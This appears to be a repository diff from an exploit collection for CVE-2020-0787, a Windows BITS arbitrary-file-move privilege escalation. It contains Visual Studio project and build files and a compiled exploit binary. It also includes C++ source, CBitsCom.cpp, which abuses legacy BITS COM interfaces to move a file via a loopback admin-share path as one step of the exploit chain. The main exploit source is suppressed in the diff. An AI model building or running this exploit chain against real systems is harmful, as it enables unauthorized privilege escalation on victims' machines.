<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="BitsArbitraryFileMove.cpp" />
<ClCompile Include="CBitsCom.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="BitsArbitraryFileMove.h" />
<ClInclude Include="CBitsCom.h" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
<Project>{2aa6ab5e-18a8-49f4-b25d-587e8c3e4432}</Project>
</ProjectReference>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

33
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/BitsArbitraryFileMove.vcxproj.filters Normal file
View File

@ -0,0 +1,33 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Fichiers sources">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Fichiers d%27en-tête">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Fichiers de ressources">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="BitsArbitraryFileMove.cpp">
<Filter>Fichiers sources</Filter>
</ClCompile>
<ClCompile Include="CBitsCom.cpp">
<Filter>Fichiers sources</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="BitsArbitraryFileMove.h">
<Filter>Fichiers d%27en-tête</Filter>
</ClInclude>
<ClInclude Include="CBitsCom.h">
<Filter>Fichiers d%27en-tête</Filter>
</ClInclude>
</ItemGroup>
</Project>

4
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/BitsArbitraryFileMove.vcxproj.user Normal file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>

294
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/CBitsCom.cpp Normal file
View File

@ -0,0 +1,294 @@
#include "CBitsCom.h"
CBitsCom::CBitsCom()
{
HRESULT hRes;
m_guidGroup = BITSCOM_GUID_GROUP;
hRes = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
hRes = CoCreateGuid(&m_guidJob);
m_pUnkNewJobInterface = nullptr;
}
CBitsCom::~CBitsCom()
{
m_pUnkNewJobInterface = nullptr;
m_pBackgroundCopyJob1->Release();
m_pBackgroundCopyGroup->Release();
m_pBackgroundCopyQMgr->Release();
CoUninitialize();
// NOTE: CoUninitialize() OK
}
DWORD CBitsCom::PrepareJob(LPCWSTR pwszJobLocalFilename)
{
HRESULT hRes;
// --- Create an instance of BackgroundCopyQMgr ---
//IBackgroundCopyQMgr* pBackgroundCopyQMgr;
//hRes = CoCreateInstance(__uuidof(BackgroundCopyQMgr), NULL, CLSCTX_LOCAL_SERVER, __uuidof(IBackgroundCopyQMgr), (void**)&pBackgroundCopyQMgr);
hRes = CoCreateInstance(__uuidof(BackgroundCopyQMgr), NULL, CLSCTX_LOCAL_SERVER, __uuidof(IBackgroundCopyQMgr), (void**)&m_pBackgroundCopyQMgr);
if (FAILED(hRes))
{
wprintf(L"[-] CoCreateInstance() failed. HRESULT=0x%08Xd\n", hRes);
return BITSCOM_ERR_COCREATEINSTANCE_BCQMGR;
}
if (DEBUG) { wprintf_s(L"[DEBUG] CoCreateInstance() OK\n"); }
// --- Create a Group or use existing one ---
OLECHAR* groupGuidStr;
//IBackgroundCopyGroup* pBackgroundCopyGroup;
hRes = StringFromCLSID(m_guidGroup, &groupGuidStr);
if (DEBUG) { wprintf_s(L"[DEBUG] Using Group GUID %ls\n", groupGuidStr); }
//hRes = pBackgroundCopyQMgr->GetGroup(m_guidGroup, &pBackgroundCopyGroup);
//hRes = m_pBackgroundCopyQMgr->GetGroup(m_guidGroup, &pBackgroundCopyGroup);
hRes = m_pBackgroundCopyQMgr->GetGroup(m_guidGroup, &m_pBackgroundCopyGroup);
if (SUCCEEDED(hRes))
{
//hRes = pBackgroundCopyGroup->CancelGroup();
hRes = m_pBackgroundCopyGroup->CancelGroup();
if (FAILED(hRes))
{
wprintf(L"[-] IBackgroundCopyGroup->CancelGroup() failed.\n");
wprintf(L" |__ HRESULT = 0x%08X\n", hRes);
return BITSCOM_ERR_CANCELGROUP;
}
}
if (DEBUG) { wprintf_s(L"[DEBUG] IBackgroundCopyGroup->CancelGroup() OK\n"); }
//hRes = pBackgroundCopyQMgr->CreateGroup(m_guidGroup, &pBackgroundCopyGroup);
//hRes = m_pBackgroundCopyQMgr->CreateGroup(m_guidGroup, &pBackgroundCopyGroup);
hRes = m_pBackgroundCopyQMgr->CreateGroup(m_guidGroup, &m_pBackgroundCopyGroup);
if (FAILED(hRes))
{
wprintf(L"[-] IBackgroundCopyQMgr->CreateGroup() failed.\n");
wprintf(L" |__ Group GUID = %ls\n", groupGuidStr);
//wprintf(L" |__ IBackgroundCopyGroup = %p\n", (void*)pBackgroundCopyGroup);
wprintf(L" |__ IBackgroundCopyGroup = %p\n", (void*)m_pBackgroundCopyGroup);
wprintf(L" |__ HRESULT = 0x%08X\n", hRes);
return BITSCOM_ERR_CREATEGROUP;
}
if (DEBUG) { wprintf_s(L"[DEBUG] IBackgroundCopyQMgr->CreateGroup() OK\n"); }
// --- Create a Job ---
OLECHAR* jobGuidStr;
//IBackgroundCopyJob1* backgroundCopyJob1;
hRes = StringFromCLSID(m_guidJob, &jobGuidStr);
if (DEBUG) { wprintf_s(L"[DEBUG] Using Job GUID %ls\n", jobGuidStr); }
//hRes = pBackgroundCopyGroup->CreateJob(m_guidJob, &backgroundCopyJob1);
//hRes = pBackgroundCopyGroup->CreateJob(m_guidJob, &m_pBackgroundCopyJob1);
hRes = m_pBackgroundCopyGroup->CreateJob(m_guidJob, &m_pBackgroundCopyJob1);
if (FAILED(hRes))
{
wprintf(L"[-] IBackgroundCopyGroup->CreateJob() failed.\n");
wprintf(L" |__ Job GUID = %ls\n", jobGuidStr);
//wprintf(L" |__ IBackgroundCopyJob1 = %p\n", (void *)backgroundCopyJob1);
wprintf(L" |__ IBackgroundCopyJob1 = %p\n", (void *)m_pBackgroundCopyJob1);
wprintf(L" |__ HRESULT = 0x%08X\n", hRes);
return BITSCOM_ERR_CREATEJOB;
}
if (DEBUG) { wprintf_s(L"[DEBUG] IBackgroundCopyGroup->CreateJob() OK\n"); }
// --- Add file to job ---
FILESETINFO fileSetInfo;
BSTR bstrRemoteFile = SysAllocString(L"\\\\127.0.0.1\\C$\\Windows\\System32\\drivers\\etc\\hosts");
BSTR bstrLocalFile = SysAllocString(pwszJobLocalFilename);
fileSetInfo.bstrRemoteFile = bstrRemoteFile;
fileSetInfo.bstrLocalFile = bstrLocalFile;
FILESETINFO* fileSetInfoArray = (FILESETINFO*)malloc(1 * sizeof(FILESETINFO));
if (!fileSetInfoArray)
{
SysFreeString(bstrRemoteFile);
SysFreeString(bstrLocalFile);
wprintf(L"[-] malloc() failed (Err: %d).\n", GetLastError());
return BITSCOM_ERR_ALLOC_FILESETINFO;
}
fileSetInfoArray[0] = fileSetInfo;
//hRes = backgroundCopyJob1->AddFiles(1, &fileSetInfoArray);
hRes = m_pBackgroundCopyJob1->AddFiles(1, &fileSetInfoArray);
if (FAILED(hRes))
{
wprintf(L"[-] IBackgroundCopyJob1->AddFiles() failed.\n");
wprintf(L" |__ HRESULT = 0x%08X\n", hRes);
free(fileSetInfoArray);
SysFreeString(bstrRemoteFile);
SysFreeString(bstrLocalFile);
return BITSCOM_ERR_ALLOC_ADDFILES;
}
free(fileSetInfoArray);
SysFreeString(bstrRemoteFile);
SysFreeString(bstrLocalFile);
if (DEBUG) { wprintf_s(L"[DEBUG] IBackgroundCopyJob1->AddFiles() OK\n"); }
return BITSCOM_ERR_SUCCESS;
}
DWORD CBitsCom::ResumeJob()
{
HRESULT hRes;
// --- Query new job interface ---
hRes = m_pBackgroundCopyGroup->QueryNewJobInterface(__uuidof(IBackgroundCopyJob), &m_pUnkNewJobInterface);
if (FAILED(hRes))
{
wprintf(L"[-] IBackgroundCopyJob1->QueryNewJobInterface() failed.\n");
wprintf(L" |__ HRESULT = 0x%08X\n", hRes);
return BITSCOM_ERR_QUERYNEWJOBINTERFACE;
}
if (DEBUG) { wprintf_s(L"[DEBUG] IBackgroundCopyJob1->QueryNewJobInterface() OK"); }
CComQIPtr<IBackgroundCopyJob> pBackgrounCopyJob(m_pUnkNewJobInterface);
if (!pBackgrounCopyJob)
{
wprintf(L"[-] Interface pointer cast failed.\n");
return BITSCOM_ERR_JOBINTERFACECAST;
}
// --- Resume job ---
hRes = pBackgrounCopyJob->Resume();
if (FAILED(hRes))
{
wprintf(L"[-] IBackgroundCopyJob->Resume() failed. HRESULT=0x%08X\n", hRes);
return BITSCOM_ERR_RESUMEJOB;
}
if (DEBUG) { wprintf_s(L"[DEBUG] IBackgroundCopyJob->Resume() OK"); }
return BITSCOM_ERR_SUCCESS;
}
DWORD CBitsCom::CompleteJob()
{
HRESULT hRes;
// --- Check whether we have a valid interface pointer ---
if (m_pUnkNewJobInterface == nullptr)
{
wprintf(L"[-] New job interface pointer is null.\n");
return BITSCOM_ERR_NEWJOBINTERFACEISNULL;
}
// --- Cast interface poiter to IBackgroundCopyJob ---
CComQIPtr<IBackgroundCopyJob> pBackgrounCopyJob(m_pUnkNewJobInterface);
if (!pBackgrounCopyJob)
{
wprintf(L"[-] Interface pointer cast failed.\n");
return BITSCOM_ERR_JOBINTERFACECAST;
}
// --- Monitor job state ---
DWORD dwJobState = -1;
DWORD dwMaxAttempts = 10;
do {
BG_JOB_STATE bgJobStateCurrent;
hRes = pBackgrounCopyJob->GetState(&bgJobStateCurrent);
if (FAILED(hRes))
{
wprintf(L"[-] IBackgroundCopyJob->GetState() failed.\n");
wprintf(L" |__ HRESULT = 0x%08X\n", hRes);
}
if (bgJobStateCurrent != dwJobState)
{
WCHAR bgJobStateName[MAX_JOBSTATE_NAME];
ZeroMemory(bgJobStateName, MAX_JOBSTATE_NAME * sizeof(WCHAR));
GetJobStateName(bgJobStateCurrent, bgJobStateName);
wprintf(L"[*] Job state: %ls\n", bgJobStateName);
dwJobState = bgJobStateCurrent;
}
dwMaxAttempts--;
Sleep(1000);
} while (dwJobState != BG_JOB_STATE_TRANSFERRED && dwMaxAttempts != 0);
// If job state isn't BG_JOB_STATE_TRANSFERRED, the job failed
if (dwJobState != BG_JOB_STATE_TRANSFERRED)
{
return BITSCOM_ERR_JOB;
}
// --- Complete job ---
hRes = pBackgrounCopyJob->Complete();
if (FAILED(hRes))
{
wprintf(L"[-] IBackgroundCopyJob->Complete() failed.\n");
wprintf(L" |__ HRESULT = 0x%08X\n", hRes);
return BITSCOM_ERR_COMPLETEJOB;
}
if (DEBUG) { wprintf_s(L"[DEBUG] IBackgroundCopyJob->Complete() OK\n"); }
return BITSCOM_ERR_SUCCESS;
}
BOOL CBitsCom::GetJobStateName(BG_JOB_STATE bgJobState, LPWSTR pwszJobName)
{
const WCHAR* res;
BOOL bRes = TRUE;
switch (bgJobState)
{
case BG_JOB_STATE_QUEUED:
res = L"BG_JOB_STATE_QUEUED";
break;
case BG_JOB_STATE_CONNECTING:
res = L"BG_JOB_STATE_CONNECTING";
break;
case BG_JOB_STATE_TRANSFERRING:
res = L"BG_JOB_STATE_TRANSFERRING";
break;
case BG_JOB_STATE_SUSPENDED:
res = L"BG_JOB_STATE_SUSPENDED";
break;
case BG_JOB_STATE_ERROR:
res = L"BG_JOB_STATE_ERROR";
break;
case BG_JOB_STATE_TRANSIENT_ERROR:
res = L"BG_JOB_STATE_TRANSIENT_ERROR";
break;
case BG_JOB_STATE_TRANSFERRED:
res = L"BG_JOB_STATE_TRANSFERRED";
break;
case BG_JOB_STATE_ACKNOWLEDGED:
res = L"BG_JOB_STATE_ACKNOWLEDGED";
break;
case BG_JOB_STATE_CANCELLED:
res = L"BG_JOB_STATE_CANCELLED";
break;
default:
res = L"UNKNOWN";
bRes = FALSE;
}
swprintf_s(pwszJobName, MAX_JOBSTATE_NAME, L"%ls", res);
return bRes;
}

55
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/CBitsCom.h Normal file
View File

@ -0,0 +1,55 @@
#pragma once
#include <Windows.h>
#include <iostream>
#include <qmgr.h>
#include <Bits.h>
#include <atlbase.h>
#include <strsafe.h>
#define DEBUG FALSE
#define BITSCOM_GUID_GROUP { 0x63B45B2D, 0xA84B, 0x463E, { 0x9C, 0xD4, 0xC0, 0x48, 0xC1, 0xBF, 0x9E, 0x72 } }
#define MAX_JOBSTATE_NAME 64
enum PrepareJobError
{
BITSCOM_ERR_SUCCESS,
BITSCOM_ERR_COCREATEINSTANCE_BCQMGR,
BITSCOM_ERR_CREATEGROUP,
BITSCOM_ERR_GETGROUP,
BITSCOM_ERR_CANCELGROUP,
BITSCOM_ERR_CREATEJOB,
BITSCOM_ERR_GETJOB,
BITSCOM_ERR_RESUMEJOB,
BITSCOM_ERR_JOB,
BITSCOM_ERR_COMPLETEJOB,
BITSCOM_ERR_ALLOC_FILESETINFO,
BITSCOM_ERR_ALLOC_ADDFILES,
BITSCOM_ERR_QUERYNEWJOBINTERFACE,
BITSCOM_ERR_JOBINTERFACECAST,
BITSCOM_ERR_NEWJOBINTERFACEISNULL
};
class CBitsCom
{
private:
GUID m_guidGroup;
GUID m_guidJob;
IBackgroundCopyQMgr* m_pBackgroundCopyQMgr;
IBackgroundCopyGroup* m_pBackgroundCopyGroup;
IBackgroundCopyJob1* m_pBackgroundCopyJob1;
CComPtr<IUnknown> m_pUnkNewJobInterface;
public:
CBitsCom();
~CBitsCom();
public:
DWORD PrepareJob(LPCWSTR pwszJobLocalFilename);
DWORD ResumeJob();
DWORD CompleteJob();
private:
BOOL GetJobStateName(BG_JOB_STATE bgJobState, LPWSTR pwszJobName);
};

2
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/x64/Debug/BitsArbi.36C758EB.tlog/BitsArbitraryFileMove.lastbuildstate Normal file
View File

@ -0,0 +1,2 @@
#TargetFrameworkVersion=v4.0:PlatformToolSet=v120:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
Debug|x64|C:\Users\Administrator\Desktop\tmp\CVE-2020-0787-EXP-ALL-WINDOWS-VERSION\BitsArbitraryFileMove-master\|

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/x64/Debug/BitsArbi.36C758EB.tlog/CL.read.1.tlog Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/x64/Debug/BitsArbi.36C758EB.tlog/CL.write.1.tlog Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/x64/Debug/BitsArbi.36C758EB.tlog/Lib-link.read.1.tlog Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/x64/Debug/BitsArbi.36C758EB.tlog/Lib-link.write.1.tlog Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/x64/Debug/BitsArbi.36C758EB.tlog/cl.command.1.tlog Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/x64/Debug/BitsArbi.36C758EB.tlog/lib.command.1.tlog Normal file
View File

Binary file not shown.

6
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/x64/Debug/BitsArbitraryFileMove.log Normal file
View File

@ -0,0 +1,6 @@
 CBitsCom.cpp
c:\users\administrator\desktop\tmp\cve-2020-0787-exp-all-windows-version\bitsarbitraryfilemove-master\bitsarbitraryfilemove\CBitsCom.h(10): warning C4005: “DEBUG”: 宏重定义
D:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\atlmfc\include\atldef.h(148) : 参见“DEBUG”的前一个定义
BitsArbitraryFileMove.cpp
正在生成代码...
BitsArbitraryFileMove.vcxproj -> C:\Users\Administrator\Desktop\tmp\CVE-2020-0787-EXP-ALL-WINDOWS-VERSION\BitsArbitraryFileMove-master\x64\Debug\BitsArbitraryFileMove.lib

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/x64/Debug/BitsArbitraryFileMove.obj Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/x64/Debug/CBitsCom.obj Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/x64/Debug/vc120.idb Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/x64/Debug/vc120.pdb Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMoveExploit.exe Normal file
View File

Binary file not shown.

1150
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMoveExploit/BitsArbitraryFileMoveExploit.cpp Normal file
View File

File diff suppressed because it is too large Load Diff

177
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMoveExploit/BitsArbitraryFileMoveExploit.vcxproj Normal file
View File

@ -0,0 +1,177 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<ProjectGuid>{279C1CA8-E748-4BEC-BB7D-8AE7AEA2E60E}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>BitsArbitraryFileMoveExploit</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Static</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<AdditionalIncludeDirectories>..\BitsArbitraryFileMove;..\UsoDllLoader</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
<AdditionalLibraryDirectories>
</AdditionalLibraryDirectories>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<AdditionalIncludeDirectories>..\BitsArbitraryFileMove;..\UsoDllLoader</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<AdditionalDependencies>$(SolutionDir)x64\Debug\BitsArbitraryFileMove.lib;$(SolutionDir)x64\Debug\CommonUtils.lib;AdvApi32.lib</AdditionalDependencies>
<IgnoreSpecificDefaultLibraries>
</IgnoreSpecificDefaultLibraries>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
